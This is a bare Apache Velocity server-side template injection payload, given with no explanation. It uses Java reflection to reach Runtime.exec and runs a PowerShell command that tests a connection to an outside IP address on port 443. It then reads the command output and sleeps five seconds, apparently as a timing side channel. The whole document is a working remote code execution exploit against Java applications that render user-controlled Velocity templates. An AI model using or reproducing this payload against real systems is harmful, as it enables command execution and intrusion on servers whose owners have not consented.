#set ($e="exp")
#set ($cmdd="powershell -Command test-netconnection 145.249.107.237 -port 443")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmdd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
$e.getClass().forName("java.lang.Thread").getMethod("sleep",long.getClass()).invoke(null,5000)
#if($scan.hasNextByte())
    $scan.nextByte()
#end
